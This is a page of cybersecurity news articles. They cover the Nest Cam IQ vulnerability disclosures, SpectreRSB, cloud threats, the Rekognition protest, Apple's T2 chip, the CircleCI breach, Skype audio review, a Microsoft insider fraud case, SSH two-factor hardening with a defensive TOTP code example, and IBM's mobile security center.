
Tech News - Cybersecurity

373 Articles
Cisco Talos researchers disclose eight vulnerabilities in Google’s Nest Cam IQ indoor camera

Savia Lobo
23 Aug 2019
4 min read

On Monday, August 19, the Cisco Talos research team disclosed eight security vulnerabilities in Google’s Nest Cam IQ, a high-end indoor security camera (IoT device). These vulnerabilities allow attackers to take over the camera, prevent its use, or execute code on it. The two researchers, Lilith Wyatt and Claudio Bozzato, said that the eight vulnerabilities apply to version 4620002 of the Nest Cam IQ Indoor and are located in Nest’s implementation of the Weave protocol, which is designed specifically for communication among Internet of Things (IoT) devices. Per Cisco Talos, Nest Labs’ Cam IQ Indoor integrates security-enhanced Linux in Android, Google Assistant and facial recognition into a compact security camera.

Nest has provided a firmware update that the company says fixes the vulnerabilities. Nest says the update will be applied automatically if the user’s camera is connected to the internet.

The researchers said in their official statement, "Nest Cam IQ Indoor primarily uses the Weave protocol for setup and initial communications with other Nest devices over TCP, UDP, Bluetooth, and 6lowpan.” They added, "It is important to note that while the weave-tool binary also lives on the camera and is vulnerable, it is not normally exploitable as it requires a local attack vector (i.e. an attacker-controlled file) and the vulnerable commands are never directly run by the camera."

The eight vulnerabilities in Google Nest Cam IQ

TCP connection denial-of-service vulnerability
This exploitable denial-of-service vulnerability (CVE-2019-5043) exists in the Weave daemon of the Nest Cam IQ Indoor, version 4620002. A set of TCP connections can cause unrestricted resource allocation, resulting in a denial of service. An attacker can connect multiple times to trigger this vulnerability.

Legacy pairing information disclosure vulnerability
This exploitable information disclosure vulnerability (CVE-2019-5034) exists in the Weave legacy pairing functionality of the Nest Cam IQ Indoor, version 4620002. A set of specially crafted Weave packets can cause an out-of-bounds read, resulting in information disclosure.

PASE pairing brute force vulnerability
This vulnerability (CVE-2019-5035) exists in the Weave PASE pairing functionality of the Nest Cam IQ Indoor, version 4620002. A set of specially crafted Weave packets can brute force a pairing code, resulting in greater Weave access and potentially full device control.

KeyError denial-of-service vulnerability
This vulnerability (CVE-2019-5036) exists in the Weave error reporting functionality of the Nest Cam IQ Indoor, version 4620002. A specially crafted Weave packet can cause an arbitrary Weave Exchange Session to close, resulting in a denial of service.

WeaveCASEEngine::DecodeCertificateInfo vulnerability
This vulnerability (CVE-2019-5037) exists in the Weave certificate loading functionality of the Nest Cam IQ Indoor camera, version 4620002. A specially crafted Weave packet can cause an integer overflow and an out-of-bounds read on unmapped memory, resulting in a denial of service.

Tool Print-TLV code execution vulnerability
This exploitable command execution vulnerability (CVE-2019-5038) exists in the print-tlv command of Weave tools. A specially crafted Weave TLV can trigger a stack-based buffer overflow, resulting in code execution. An attacker can trigger this vulnerability by convincing the user to open a specially crafted Weave command.

ASN1Writer PutValue code execution vulnerability
This exploitable command execution vulnerability (CVE-2019-5039) exists in the ASN1 certificate writing functionality of Openweave-core, version 4.0.2. A specially crafted Weave certificate can trigger a heap-based buffer overflow, resulting in code execution. An attacker can exploit this vulnerability by tricking the user into opening a specially crafted Weave certificate.

DecodeMessageWithLength information disclosure vulnerability
This vulnerability (CVE-2019-5040) exists in the Weave MessageLayer parsing of Openweave-core, version 4.0.2, and the Nest Cam IQ Indoor, version 4620002. A specially crafted Weave packet can cause an integer overflow, resulting in PacketBuffer data reuse.

In a statement to ZDNet, Google said, "We've fixed the disclosed bugs and started rolling them out to all Nest Camera IQs. The devices will update automatically so there's no action required from users."

To know more about this news in detail, read Cisco Talos’ official blog post.

SpectreRSB targets CPU return stack buffer, found on Intel, AMD, and ARM chipsets

Savia Lobo
25 Jul 2018
4 min read

Attacks exploiting operating systems and applications have been on an exponential rise in recent times. One popular class of vulnerability is Spectre, which exploits the speculative execution mechanism employed in modern processor chips and has recently targeted Intel, AMD, and ARM. An exploit assumed dead has resurfaced as a new Spectre variant, SpectreRSB, which successfully exploits the return stack buffer (RSB), a common predictor structure in modern CPUs used to predict return addresses.

Spectre, first detected in January this year, has remained resilient. Spectre variant 1 is the one Dartmouth claimed to resolve using its ELFbac policy techniques. Next came Spectre variant 2, which Google fixed using its Retpoline. Then followed the new data-stealing exploits Spectre 1.1 and 1.2, detected just two weeks ago by Vladimir Kiriansky and Carl Waldspurger. The most recent one in the headlines is SpectreRSB.

This Spectre-class exploit was revealed by security experts from the University of California, Riverside (UCR). They describe the new attack method in a research paper published on arXiv, titled ‘Spectre Returns! Speculation Attacks using the Return Stack Buffer’.

What is SpectreRSB?

The SpectreRSB exploit relies on speculative execution, a feature found in several modern CPUs for optimizing computing performance. Because of the gap between the potential speed of modern CPUs and that of memory, the CPU speculatively executes batches of instructions to keep efficiency at peak levels. Once those instructions start executing, the CPU does not check whether the memory accesses served from the cache touch privileged memory. This is the window that such exploits use to attack the system. As per the UCR researchers, SpectreRSB takes a slight detour from other similar attacks such as Meltdown: rather than exploiting the branch predictor units of CPUs or CPU cache components, SpectreRSB exploits the Return Stack Buffer (RSB).

Researcher Nael Abu-Ghazaleh wrote, “To launch the attack, the attacker should poison the RSB (a different and arguably easier process than poisoning the branch predictor) and then cause a return instruction without a preceding call instruction in the victim (which is arguably more difficult than finding an indirect branch).”

The paper says SpectreRSB also enables an attack against the Intel SGX (Software Guard Extensions) compartment, where a malicious OS pollutes the RSB to cause a mis-speculation that exposes data outside an SGX compartment. This attack bypasses all software and microcode patches on the SGX machine.

How to defend against SpectreRSB?

The researchers stated that they reported SpectreRSB to the companies that use RSBs to predict return addresses, namely Intel, AMD and ARM. AMD and ARM did not respond to a request for comment from Threatpost. In reply to Threatpost, however, an Intel spokesperson stated via email, “SpectreRSB is related to branch target injection (CVE-2017-5715), and we expect that the exploits described in this paper are mitigated in the same manner.” He further stated, “We have already published guidance for developers in the whitepaper, Speculative Execution Side Channel Mitigations. We are thankful for the ongoing work of the research community as we collectively work to help protect customers.”

The UCR researchers stated that the newly found SpectreRSB cannot be prevented using previously known defenses such as Google’s Retpoline fix and Intel’s microcode patches. However, they did mention a defense that mitigates SpectreRSB, known as RSB stuffing, which currently exists on Intel’s Core i7 processors starting from the Skylake lineup. With RSB stuffing, also known as RSB refilling, every time there is a switch into the kernel the RSB is intentionally filled with the address of a benign delay gadget to avoid the possibility of mis-speculation. Abu-Ghazaleh told Threatpost, “For some of the more dangerous attacks, the attack starts from the user code, but it's trying to get the OS to return to the poisoned address. Refilling overwrites the entries in the RSB whenever we switch to the kernel (for example, at the same points where the KPTI patch remaps the kernel addresses). So, the user cannot get the kernel to return to its poisoned addresses in the RSB.”

Read more about SpectreRSB in its research paper.

Top 5 cloud security threats to look out for in 2018

Gebin George
13 Apr 2018
4 min read

In the era of cloud deployment and DevOps, cloud adoption has seen a steady rise since 2017. A Forbes report states that the global public cloud market will rise to $178B in 2018, compared with $146B in 2017, and will continue to grow at a staggering 22% compound annual growth rate (CAGR). Though all major cloud service providers offer a wide range of efficient security services, security still remains a looming concern when it comes to cloud adoption. Service providers do try to address the major security concerns, but it is always advisable to keep a tab on the major cloud security threats that can haunt you. Following are the top 5 trending cloud security threats for 2018:

Data breaches and losses

As the name suggests, a breach of any confidential data pertaining to personal, health or financial information is termed a data breach. The US reported the highest number of security breaches (1579) in 2017, with the business sector accounting for 55% of them. Data breaches can be the primary objective of a malicious attack, or the result of poor security practices. Data loss can result from a cyber-attack, a natural disaster, or just an accidental deletion. The best way to avoid data loss is to keep strong backups at different geographical locations.

Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks

This is one of the most popular forms of attack and very simple for any attacker to execute. DoS is also trending in the Dark Web ecosystem: it is offered as a Dark Web service that can be bought for a small amount of cryptocurrency, which makes it even simpler for attackers. Security countermeasures like implementing an intrusion prevention system, or setting clear expectations with the ISP for clean bandwidth, can help you prevent DoS attacks to a limited extent. DDoS-as-a-Service, which has been popular for decades, remains trending in 2018. GitHub experienced the biggest-ever DDoS attack, with an intensity as high as 1.35 Tbps via 126.9 million packets per second.

Insecurity in APIs

Application programming interfaces (APIs) are the software interfaces provided by cloud service providers so that users can interact with the cloud environment. Exploiting an API vulnerability is the most direct way to gain access to confidential information, so APIs need to be secured thoroughly. A critical vulnerability discovered in a popular browser extension, Grammarly, is a perfect example of the threat posed by insecure APIs. An API testing methodology is considered an effective way to secure cloud APIs before they go live. API change reporting can also be performed on a regular basis to ensure API security.

Lack of secure identity and access management

Attackers masquerading as developers, users, and operators can read, modify or misuse the data in the cloud. A lack of secure credentials or access management can therefore lead to a breach of information through unauthorized access to data, potentially causing a big loss to the organization. A critical flaw was discovered in the CyberArk Enterprise Password Vault application which allowed an attacker to gain unauthorized access to the system and its data.

Malware attacks

2017 was the year of malware attacks, with widely reported threats like ransomware, Petya, Meltdown and Spectre disrupting the entire security mechanism of many organizations. These affected everything from smartphones to servers and continue to be a looming threat for the cloud as well. There are minor patches that can be applied to prevent these attacks, but they seem to degrade the performance of cloud servers to a great extent.

Having a close eye on these security vulnerabilities will help you secure your cloud solutions and ecosystems. With machine learning based cyber attacks and hacking becoming bolder and more common, it is not enough to stay current in your knowledge of these threats and the cyber security solutions available in the market. To learn how to secure your cloud environments, you can get your hands on a few of our books: Mastering AWS Security, Cloud Security Automation, and Enterprise Cloud Security and Governance.

“We can sell dangerous surveillance systems to police or we can stand up for what’s right. We can’t do both,” says a protesting Amazon employee

Natasha Mathur
18 Oct 2018
5 min read

An Amazon employee has spoken out, in a letter, against Amazon selling its facial recognition technology, named Rekognition, to police departments across the world. The news of Amazon selling its facial recognition technology to the police first came out in May this year. Earlier this week, Jeff Bezos spoke at the WIRED25 Summit regarding the use of technology to help the Department of Defense: "We are going to continue to support the DoD, and I think we should. The last thing we'd ever want to do is stop the progress of new technologies. If big tech companies are going to turn their back on US Department of Defense, this country is going to be in trouble.”

Soon after, a letter was published yesterday on Medium by an anonymous Amazon employee, whose identity was verified offline by the Medium editorial team. It read, “A couple weeks ago, my co-workers delivered a letter to this effect, signed by over 450 employees, to Jeff Bezos and other executives. We know Bezos is aware of these concerns... he acknowledged that big tech’s products might be misused, even exploited, by autocrats. But rather than meaningfully explain how Amazon will act to prevent the bad uses of its own technology, Bezos suggested we wait for society’s immune response”.

The letter also laid out the employees’ demands to remove Palantir, the software firm powering ICE’s deportation and tracking program, from Amazon Web Services, along with the need to initiate employee oversight of ethical decisions within the company. It also clearly states that their concern is not about harm that some company might cause in the future. Instead, it is about the fact that Amazon is “designing, marketing, and selling a system for mass surveillance right now”. In fact, Rekognition is already being used by law enforcement with zero debate or restrictions on its use from Amazon. For instance, Orlando, Florida, is currently testing Rekognition with live video feeds from surveillance cameras around the city.

Rekognition is a deep-learning based service which is capable of storing and searching tens of millions of faces at a time. It allows detection of objects, scenes, activities and inappropriate content. Amazon had also received criticism from the ACLU regarding selling Rekognition to police, which said, “People should be free to walk down the street without being watched by the government. By automating mass surveillance, facial recognition systems like Rekognition threaten this freedom, posing a particular threat to communities already unjustly targeted in the current political climate. Once powerful surveillance systems like these are built and deployed, the harm will be extremely difficult to undo.”

Amazon was quick to defend itself at the time and said in a statement emailed to various news organizations, “Our quality of life would be much worse today if we outlawed new technology because some people could choose to abuse the technology. Imagine if customers couldn’t buy a computer because it was possible to use that computer for illegal purposes? Like any of our AWS services, we require our customers to comply with the law and be responsible when using Amazon Rekognition.”

The protest by Amazon employees is over the same concern as the ACLU’s. Putting Rekognition in the hands of the government puts people’s privacy at stake, as they will not be able to go about their lives without being constantly monitored by the government. “Companies like ours should not be in the business of facilitating authoritarian surveillance. Not now, not ever. But Rekognition supports just that by pulling dozens of facial IDs from a single frame of video and storing them for later use or instantly comparing them with databases of millions of pictures. We cannot profit from a subset of powerful customers at the expense of our communities; we cannot avert our eyes from the human cost of our business”, the letter says.

The letter also points out that Rekognition is not accurate in its ability to identify people and is a “flawed technology” that is more likely to “misidentify people” with darker skin tones. For instance, earlier this year Rekognition was tested with pictures of Congress members compared against a collection of mugshots. The result was 28 false matches, with incorrect results being higher for people of color. This makes it irresponsible, unreliable and unethical for the government to use Rekognition.

“We will not silently build technology to oppress and kill people, whether in our country or in others. Amazon talks a lot about values of leadership. If we want to lead, we need to make a choice between people and profits. We can sell dangerous surveillance systems to police or we can stand up for what’s right. We can’t do both”, reads the letter.

For more information, check out the official letter by Amazon employees.

Apple T2 security chip has Touch ID, Security Enclave, hardware to prevent microphone eavesdropping, amongst many other features!

Melisha Dsouza
31 Oct 2018
4 min read

Apple’s special event held in Brooklyn yesterday saw the unveiling of a host of new hardware and software, including the MacBook Air 2018 and the Mac mini. Along with this, Apple also published a complete security overview white paper that lists in detail the features of the T2 security chip incorporated into the Mac mini and MacBook Air. The chip disconnects the device’s microphone when the laptop is closed. It also prevents tampering with data while introducing a strict level of security for its devices. Let’s look at the features of this chip that caught our attention.

#1 Disabling the microphone on closing the laptop

One of the major features of the T2 chip is disconnecting the device’s microphone when the laptop is closed. The chip, first introduced in last year's iMac Pro, has been upgraded to prevent any kind of malware from eavesdropping on a user’s conversation once the laptop’s lid is shut. Apple further notes that the camera is not disabled because the field of view of the lens is completely obstructed while the lid is closed.

#2 Secure Enclave

The Secure Enclave is a coprocessor incorporated within the system on chip (SoC) of the Apple T2 Security Chip. It provides dedicated security by protecting the cryptographic keys needed for FileVault and secure boot. What's more, it processes fingerprint data from the Touch ID sensor and checks whether a match is present. Apple further mentions that its limited function is a virtue: “Security is enhanced by the fact that the hardware is limited to specific operations.”

#3 Storage encryption

The Apple T2 Security Chip has a dedicated AES crypto engine built into the DMA path between the flash storage and main system memory. This makes it very efficient to perform internal volume encryption using FileVault with AES-XTS. The Mac unique ID (UID) and a device group ID (GID) are AES 256-bit keys included in the Secure Enclave during manufacturing. It is designed so that no software or firmware can read the keys directly; the keys can be used only by the AES engine dedicated to the Secure Enclave. The UID is unique to each device and is generated completely within the Secure Enclave rather than in a manufacturing system outside of the device. Hence, the UID key isn’t available for access or storage by Apple or any Apple suppliers. Software that runs on the Secure Enclave takes advantage of the UID to protect Touch ID data, FileVault class keys, and the Keychain.

#4 Touch ID

The T2 chip processes the data from Touch ID to authenticate a user. Touch ID data is a mathematical representation of the fingerprint which is encrypted and stored on the device. It is protected with a key available only to the Secure Enclave, which is used to verify a match with the enrolled information. The data cannot be accessed by macOS or by any apps running on it, is never stored on Apple servers, and is not backed up to iCloud. This ensures that only authenticated users can access the device.

#5 Secure Boot

The T2 Security Chip ensures that each step of the startup process contains components that are cryptographically signed by Apple to verify integrity. The boot process proceeds only after verifying the integrity of the software at every step. When a Mac computer with the T2 chip is turned on, the chip executes code from read-only memory known as the Boot ROM. This unchangeable code, referred to as the hardware root of trust, is laid down during chip fabrication and audited for vulnerabilities to ensure all-round security of the process.

These robust features of the T2 chip are definitely something to watch out for. You can read the whitepaper to understand more about the chip’s features.

CircleCI reports of a security breach and malicious database in a third-party vendor account

Amrata Joshi
05 Sep 2019
4 min read

Last week, the team at CircleCI disclosed a security breach incident that involved CircleCI and a third-party analytics vendor. An attacker got access to user data from the third-party vendor account, including usernames, email addresses associated with GitHub and Bitbucket, user IP addresses, and user-agent strings. According to the CircleCI team, information about repository URLs and names, organization names, branch names, and repository owners might also have been exposed during this incident. CircleCI user secrets, build artifacts, source code, build logs, and other production data were not accessed during this incident. Auth tokens, password hashes, credit card and financial information were not accessed either.

The security and engineering teams at CircleCI revoked the access of the compromised user and launched an investigation. The official page reads, “CircleCI does not collect social security numbers or credit card information; therefore, it is highly unlikely that this incident would result in identity theft.”

How did the security breach occur?

The incident took place on 31st August at 2:32 p.m. UTC and came to notice when a CircleCI team member saw an email notification about the incident from one of their third-party analytics vendors. It was then suspected that some unusual activity was taking place in a particular vendor account. The employee forwarded the email to the security and engineering teams, after which the investigation started and steps were taken to control the situation. According to CircleCI’s engineering team, the added database was not a CircleCI resource. The team removed the malicious database and the compromised user from the tool and reached out to the third-party vendor to collaborate on the investigation. At 2:43 p.m. UTC, the security teams started disabling the improperly accessed account, and by 3:00 p.m. UTC this process was complete.

According to the team, customers who accessed the platform between June 30, 2019, and August 31, 2019, could possibly be affected. The page further reads, “In the interest of transparency, we are notifying affected CircleCI users of the incident via email and will provide relevant updates on the FAQ page as they become available.”

CircleCI will strengthen its platform’s security

The team will continue to collaborate with the third-party vendor to find out the exact vulnerability that caused the incident. The team will review their policies for enforcing 2FA on third-party accounts and continue their transition to single sign-on (SSO) for all of their integrations. This year, the team also doubled the size of their security team. The official post reads, “Our security team is taking steps to further enhance our security practices to protect our customers, and we are looking into engaging a third-party digital forensics firm to assist us in the investigation and further remediation efforts. While the investigation is ongoing, we believe the attacker poses no further risk at this time.” The page further reads, “However, this is no excuse for failing to adequately protect user data, and we would like to apologize to the affected users. We hope that our remediations and internal audits are able to prevent incidents like this and minimize exposures in the future. We know that perfect security is an impossible goal, and while we can’t promise that, we can promise to do better.”

A few users on HackerNews discussed how CircleCI has taken users’ data and its security for granted by handing it over to a third party. A user commented on HackerNews, “What's sad about this is that CircleCI actually has a great product and is one of the nicest ways to do end to end automation for mobile development/releases. Having their pipeline in place actually feels quite liberating. The sad part is that they take this for granted and liberate all your data and security weaknesses too to unknown third parties for either a weird ideological reason about interoperability or a small marginal profit.” Others appreciated the company’s efforts in resolving the issue. Another user commented, “This is how you handle a security notification. Well done CircleCI, looking forward to the full postmortem.”
Microsoft contractors also listen to Skype and Cortana audio recordings, joining Amazon, Google and Apple in privacy violation scandals

Savia Lobo
12 Aug 2019
5 min read

In a recent report, Motherboard reveals, “Contractors working for Microsoft are listening to personal conversations of Skype users conducted through the app's translation service.” The allegation is based on a cache of internal documents, screenshots, and audio recordings obtained by Motherboard. These files also reveal that the contractors were listening to voice commands given to Cortana.

While the Skype FAQ does mention that the company collects and uses conversations to improve products and services, and that it may analyze audio of phone calls that a user wants translated in order to improve the chat platform's services, it nowhere informs users that some of the voice analysis may be done manually.

Earlier this year, Apple, Amazon, and Google faced scrutiny over how they handle users’ voice data obtained from their respective voice assistants. After the Guardian’s investigation into Apple employees listening in on Siri conversations was published, Apple announced it had temporarily suspended human transcribers from listening to conversations users had with Siri. Google agreed to stop listening in on and transcribing Google Assistant recordings for three months in Europe. Google’s decision to halt its review process was disclosed after a German privacy regulator started investigating the program after “a contractor working as a Dutch language reviewer handed more than 1,000 recordings to the Belgian news site VRT which was then able to identify some of the people in the clips,” TechCrunch reports. Amazon, on the other hand, now allows users to opt out of the program that allows contractors to manually review voice data. Bloomberg was the first to report in April that “Amazon had a team of thousands of workers around the world listening to Alexa audio requests with the goal of improving the software”.

The anonymous Microsoft contractor who shared the cache of files with Motherboard said, “The fact that I can even share some of this with you shows how lax things are in terms of protecting user data.”

In an online chat, Frederike Kaltheuner, data exploitation program lead at activist group Privacy International, told Motherboard, “People use Skype to call their lovers, interview for jobs, or connect with their families abroad. Companies should be 100% transparent about the ways people's conversations are recorded and how these recordings are being used." She further added, “If a sample of your voice is going to human review (for whatever reason) the system should ask them whether you are ok with that, or at least give you the option to opt-out."

Pat Walshe, an activist from Privacy Matters, said in an online chat with Motherboard, "The marketing blurb for [Skype Translator] refers to the use of AI not humans listening in. This whole area needs a regulatory review." "I’ve looked at it (Skype Translator FAQ) and don’t believe it amounts to transparent and fair processing," he added.

A Microsoft spokesperson told Motherboard in an emailed statement, "Microsoft collects voice data to provide and improve voice-enabled services like search, voice commands, dictation or translation services. We strive to be transparent about our collection and use of voice data to ensure customers can make informed choices about when and how their voice data is used. Microsoft gets customers’ permission before collecting and using their voice data." The statement continues, "We also put in place several procedures designed to prioritize users’ privacy before sharing this data with our vendors, including de-identifying data, requiring non-disclosure agreements with vendors and their employees, and requiring that vendors meet the high privacy standards set out in European law. We continue to review the way we handle voice data to ensure we make options as clear as possible to customers and provide strong privacy protections."

How safe is user data with these smart assistants looped with manual assistance?

According to the documents and screenshots, when a contractor is given a piece of audio to transcribe, they are also given a set of approximate translations generated by Skype's translation system. “The contractor then needs to select the most accurate translation or provide their own, and the audio is treated as confidential Microsoft information, the screenshots show,” Motherboard reports. Microsoft said this data is only available to the transcribers “through a secure online portal, and that the company takes steps to remove identifying information such as user or device identification numbers.”

The contractor told Motherboard, "Some stuff I've heard could clearly be described as phone sex. I've heard people entering full addresses in Cortana commands or asking Cortana to provide search returns on pornography queries. While I don't know exactly what one could do with this information, it seems odd to me that it isn't being handled in a more controlled environment."

In such an environment, users no longer feel safe: the company’s FAQ assures them that their data is safe, yet it is actually being listened to. A user on Reddit commented, “Pretty sad that we can not have a secure, private conversation from one place to another, anymore, without taking extraordinary measures, which congress also soon wants to poke holes in, by mandating back doors in these systems.”

https://twitter.com/masonremaley/status/1159140919247036416

After this revelation, people may quickly take steps such as uninstalling Skype or not sharing extra personal details in the vicinity of their smart home devices. However, such steps won’t erase everything the transcribers might have heard in the past. Will this also reduce sales of smart home devices and directly affect the IoT market for each company that offers them?

https://twitter.com/RidT/status/1159101690861301760

To know more about this news in detail, read Motherboard’s report.
Ex-Microsoft employee arrested for stealing over $10M from store credits using a test account

Savia Lobo
19 Jul 2019
4 min read
On Tuesday, one of Microsoft’s former employees, Volodymyr Kvashuk, 25, was arrested for attempting to steal $10 million worth of digital currency from Microsoft. “If convicted of mail fraud, the former Microsoft software engineer could face as much as 20 years in prison and a $250,000 fine”, The Register reports.

Kvashuk, a Ukrainian citizen residing in Renton, Washington, was hired by Microsoft in August 2016 as a contractor and stayed until June 2018. He was part of Microsoft’s Universal Store Team (UST), whose duty is to handle the company's e-commerce operations. Sam Guckenheimer, product owner for Azure DevOps at Microsoft, said back in 2017 that the UST "is the main commercial engine of Microsoft with the mission to bring One Universal Store for all commerce at Microsoft.” He further explained, "The UST encompasses everything Microsoft sells and everything others sell through the company, consumer and commercial, digital and physical, subscription and transaction, via all channels and storefronts".

According to the prosecution’s complaint, filed in a US federal district court in Seattle, the UST team was assigned to make simulated purchases of products from the online store to ensure customers could make purchases without any glitches. The test accounts used to make these purchases were linked to artificial payment devices (“Test In Production” or “TIP” cards) that allowed the tester to simulate a purchase without generating an actual charge. The program was designed to block the delivery of physical goods. However, no restrictions or safeguards were in place to block test purchases of digital currency, i.e. “Currency Stored Value” or “CSV”, which could also be used to buy Microsoft products or services. Kvashuk fraudulently obtained these CSVs and resold them to third parties, which reaped him over $10,000,000 in CSV as well as some property from Microsoft. Kvashuk bought these CSVs while disguising his identity with different false names and statements.

According to The Register, “The scheme supposedly began in 2017 and escalated to the point that Kvashuk, on a base salary of $116,000 per year, bought himself a $162,000 Tesla and $1.6m home in Renton, Washington”.

Microsoft's UST Fraud Investigation Strike Team (FIST) noticed an unexpected rise in the use of CSV to buy subscriptions to Microsoft's Xbox gaming system in February 2018. By tracing the digital funds, the investigators found that these had been resold on two different websites, to two whitelisted test accounts. FIST then traced the accounts and transactions involved. With the assistance of the US Secret Service and the Internal Revenue Service, investigators concluded that Kvashuk had defrauded Microsoft. Kvashuk had also used a Bitcoin mixing service to hide his public blockchain transactions.

“In addition to service provider records that point to Kvashuk, the complaint notes that Microsoft's online store uses a form of device fingerprinting called a Fuzzy Device ID. Investigators, it's claimed, linked a specific device identifier to accounts associated with Kvashuk”, according to The Register.

One of the users on Hacker News mentions, “There are two technically interesting takeaways in this: 1 - Microsoft, and probably most big companies, have persistent tracking ID on most stuff that is hard to get rid of and can be used to identify you and devices linked to you in a fuzzy way. I mean, we know about super cookies, fingerprinting and such, but it's another to hear it being used to track somebody that was careful and using multiple anonymous accounts. 2 - BTC mixers will not protect you. Correlating one single wallet with you will make it possible for them to retrace the entire history.”

To know about this news in detail, head over to the prosecution’s complaint.
Liz Fong-Jones on how to secure SSH with Two Factor Authentication (2FA)

Savia Lobo
22 Apr 2019
4 min read
Over the weekend, Liz Fong-Jones, a Developer Advocate at honeycomb.io, posted her experience with the security hardening of honeycomb.io’s infrastructure. In her post on GitHub, Liz explains how SSH keys, which provide authentication between hosts, can be vulnerable to different threats that are easily overlooked.

Liz mentions that by adding passphrase encryption, private keys become resistant to theft at rest. However, when they are in use, the usability challenge of re-entering the passphrase on every connection means that “engineers began caching keys unencrypted in memory of their workstations, and worse yet, forwarding the agent to allow remote hosts to use the cached keys without further confirmation”. The Matrix breach, which took place on April 11, shows what happens when authenticated sessions are allowed to propagate without a middle-man. The intruder in the Matrix breach had access to the production databases, potentially giving them access to unencrypted message data, password hashes, and access tokens.

Liz also mentions two primary ways of preventing an attacker from misusing credentials:
• Using a separate device that generates, from a shared secret, numerical codes that we can transfer out of band and enter alongside the key.
• Having a separate device perform all the cryptography, and only when physically authorized by the user.

In her post, Liz asks, “What will work for a majority of developers who are used to simply loading their SSH key into the agent at the start of their login session and SSHing everywhere?” and also shares her work on how one can avoid such threats. One prerequisite Liz mentions is, “I'm assuming that you have a publicly exposed bastion host for each environment that intermediates accesses to the rest of each environment's VPC, and use SSH keys to authenticate from laptops to the bastion and from the bastion to each VM/container in the VPC”.

As a preliminary step, the user should start by enabling numerical time-based one-time passwords (TOTP) for SSH authentication. A malicious host could still impersonate the real bastion (if strict host checking isn't on), intercept the OTP, and then use it to authenticate to the real bastion; nevertheless, “it's better than being wormed or compromised because you forgot to take basic measures against even a passive adversary”, Liz states. After the server and client setup, the user needs to use Chef to populate /etc/2fa_token_keys with keys that are generated and stored securely.

There are different setup methods, including:

Mac client setup: Users with Touchbar Macs should use TouchID to authenticate logins, as they'll have their laptop and their fingers with them anyway. For instance, SeKey is an SSH agent that allows users to authenticate to UNIX/Linux SSH servers using the Secure Enclave.

Krypt.co setup for iOS and Android: With the help of krypt.co, instead of generating OTPs and sending them over manually, mobile devices can securely store SSH keys and only remotely authorize their use (sending the signed challenge to the remote server) with a single click. This process is even more secure than a TOTP app so long as the user supplies appropriate parameters to force hardware coprocessor storage (NIST P-256 for iOS, and 3072-bit RSA for Android, on new enough devices). Make sure people use screen locks!

Liz in her post also explores YubiKey hardware token and Linux/ChromeOS client setup. To know more about this and how to set it up in detail, read Liz’s GitHub post.
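To make the preliminary TOTP step concrete, here is an added example (not code from Liz's post, honeycomb.io, or any PAM module) of the check a bastion performs on an RFC 6238 code; the `TotpVerifier` class and user names are assumed, and the shared secret is the RFC's published test secret, used here as constructed input. It goes one step beyond the summary by refusing to accept any time step at or before the last one already used, so a code captured by an impersonating host can be consumed at most once.

```python
"""Server-side TOTP verification for an SSH second factor (added example).

Implements RFC 6238 (HMAC-SHA1, 30-second steps, 6 digits) and records the
last accepted time step per user, so a replayed code is rejected even while
its time window is still open. Secret and timestamps are constructed
(the RFC 6238 test secret "12345678901234567890").
"""
import hashlib
import hmac
import struct

TIME_STEP = 30   # seconds per code, as in the common SSH/PAM setups
DIGITS = 6
WINDOW = 1       # also accept the previous and next step for clock skew


def totp(secret: bytes, unix_time: int, step: int = TIME_STEP, digits: int = DIGITS) -> str:
    """Return the RFC 6238 code for the time step containing unix_time."""
    counter = unix_time // step
    msg = struct.pack(">Q", counter)                       # 8-byte big-endian counter
    mac = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                 # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


class TotpVerifier:
    """Per-user secrets plus the highest time step already consumed (assumed name)."""

    def __init__(self, secrets: dict):
        self._secrets = secrets        # user -> raw shared secret (constructed input)
        self._last_counter = {}        # user -> last accepted step; enforces single use

    def verify(self, user: str, code: str, unix_time: int) -> bool:
        secret = self._secrets.get(user)
        if secret is None:
            return False
        base = unix_time // TIME_STEP
        for counter in range(base - WINDOW, base + WINDOW + 1):
            # Any step at or below the last accepted one is a replay: reject it
            # even if the code would otherwise be valid.
            if counter <= self._last_counter.get(user, -1):
                continue
            expected = totp(secret, counter * TIME_STEP)
            if hmac.compare_digest(expected, code):       # constant-time compare
                self._last_counter[user] = counter
                return True
        return False


if __name__ == "__main__":
    verifier = TotpVerifier({"alice": b"12345678901234567890"})
    print(verifier.verify("alice", totp(b"12345678901234567890", 59), 59))   # True
    print(verifier.verify("alice", totp(b"12345678901234567890", 59), 70))   # False: replay
```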
IBM launches Industry's first ‘Cybersecurity Operations Center on Wheels’ for on-demand cybersecurity support

Melisha Dsouza
16 Oct 2018
4 min read
"Having a mobile facility that allows us to bring realistic cyberattack preparation and rehearsal to a larger, global audience will be a game changer in our mission to improve incident response efforts for organizations around the world." -Caleb Barlow, vice president of Threat Intelligence at IBM Security   Yesterday (On 15th October), IBM Security announced the industry's first mobile Security Operations Center- ‘The IBM X-Force Command Cyber Tactical Operations Center’ (C-TOC). This mobile command center hosted at the back of a semi truck will travel around the U.S and Europe for cybersecurity training, preparedness, and response operations. The aim of this project is to provide an on-demand cybersecurity support, while building cybersecurity awareness and skills with professionals, students and consumers. Cybercriminals are getting smarter by the day and cyber crimes are becoming sophisticated by the hour. It is necessary for organizations to plan and rehearse their response to potential security breaches in advance. According to the 2018 Cost of a Data Breach Study, companies that respond to incidents effectively and remediate the event within 30 days can save over $1 million on the total cost of a data breach. Taking this into consideration, the C-TOC has the potential to provide immediate onsite support for clients at times when their cybersecurity needs may arise. The mobile vehicle is modeled after Tactical Operations Centers used by the military and incident command posts used by first responders. It comes with a gesture-controlled cybersecurity "watch floor," data center and conference facilities. It has self-sustaining power, satellite and cellular communications, which will provide a sterile and resilient network for investigation, response and serve as a platform for cybersecurity training. 
